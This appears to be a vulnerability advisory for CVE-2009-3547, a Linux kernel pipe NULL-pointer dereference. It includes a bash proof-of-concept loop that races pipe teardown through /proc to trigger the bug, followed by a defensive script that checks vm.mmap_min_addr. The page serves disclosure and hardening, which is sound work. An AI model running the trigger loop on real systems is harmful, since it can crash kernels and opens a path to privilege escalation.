The Linux kernel is prone to a local privilege-escalation vulnerability caused by a NULL-pointer dereference.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
Exploit:
The following proof of concept is available:
    #!/bin/bash
    # Proof of concept from the advisory. Repeatedly sets up a short-lived pipe and
    # opens its write end through /proc while the pipeline is being torn down,
    # racing the release of the pipe's inode data in fs/pipe.c.
    while : ; do
        # Background a pipeline: the writer exits after one second, the reader
        # echoes lines until its input closes.
        { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
        PID=$!
        # Locate the 'sleep 1' process so its stdout (the pipe) can be reached
        # through /proc/<pid>/fd/1; keep only the first field of the ps line.
        OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
            { read PID REST ; echo $PID; } )
        OUT="${OUT%% *}"
        # Random delay of up to about one second so the open lands at varying
        # points relative to the pipeline's teardown. $RANDOM requires bash and
        # usleep is not POSIX (it ships with some distributions and busybox).
        DELAY=$((RANDOM * 1000 / 32768))
        usleep $((DELAY * 1000 + RANDOM % 1000 ))
        echo n > /proc/$OUT/fd/1 # Trigger defect
    done
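As an added defender-side check, not part of the advisory or of the proof of concept above: a kernel NULL-pointer dereference of this class yields code execution, rather than only a crash, when an unprivileged process is allowed to map memory at address zero. The vm.mmap_min_addr sysctl sets the lowest address such a process may mmap(). The script below reads /proc/sys/vm/mmap_min_addr and classifies the value; the function names, the "low"/"protected" labels and the 65536 threshold are this example's own assumptions (65536 is a common distribution default, not a value taken from the page).

```shell
#!/bin/sh
# Added example: classify the kernel's vm.mmap_min_addr setting. A value of 0
# lets an unprivileged process map the NULL page (absent LSM restrictions),
# which is what turns a kernel NULL-pointer dereference into a code-execution
# primitive instead of a denial of service.

# classify_mmap_min_addr VALUE [THRESHOLD]
# Prints one of: invalid, unprotected, low, protected. Always returns 0 so it
# is safe inside command substitution under "set -e".
classify_mmap_min_addr() {
    value="$1"
    threshold="${2:-65536}"   # assumed sane minimum; common distro default
    case "$value" in
        '' | *[!0-9]*) echo "invalid"; return 0 ;;
    esac
    if [ "$value" -eq 0 ]; then
        echo "unprotected"            # NULL page mappable by unprivileged users
    elif [ "$value" -lt "$threshold" ]; then
        echo "low"                    # page zero blocked, but below the threshold
    else
        echo "protected"
    fi
    return 0
}

# read_mmap_min_addr [PATH]
# Reads the live value; PATH is overridable so the function can be exercised
# against a constructed file. Prints an empty string if the file is unreadable.
read_mmap_min_addr() {
    path="${1:-/proc/sys/vm/mmap_min_addr}"
    if [ -r "$path" ]; then
        tr -d '[:space:]' < "$path"
    else
        echo ""
    fi
}

# check_mmap_min_addr [PATH] [THRESHOLD]
# Prints "<value> <classification>" for the given (or live) sysctl file.
check_mmap_min_addr() {
    v="$(read_mmap_min_addr "$1")"
    echo "$v $(classify_mmap_min_addr "$v" "$2")"
}

# Stand-alone usage: report the running kernel's setting.
check_mmap_min_addr
```

A result of "unprotected" means the sysctl should be raised (sysctl -w vm.mmap_min_addr=65536 and persisted in sysctl.conf); note that processes holding CAP_SYS_RAWIO are not bound by it, so the check is a hardening baseline, not a substitute for the kernel patch.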
References:
- CVE-2009-3547: kernel: fs: pipe.c null pointer dereference (Eugene Teo)
- fs/pipe.c null pointer dereference (Earl Chew)
- Linux kernel homepage (kernel.org)
- Re: [PATCH v4 1/1]: fs: pipe.c null pointer dereference + really sign off (Américo Wang)
Original: http://www.securityfocus.com
Patch code:
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/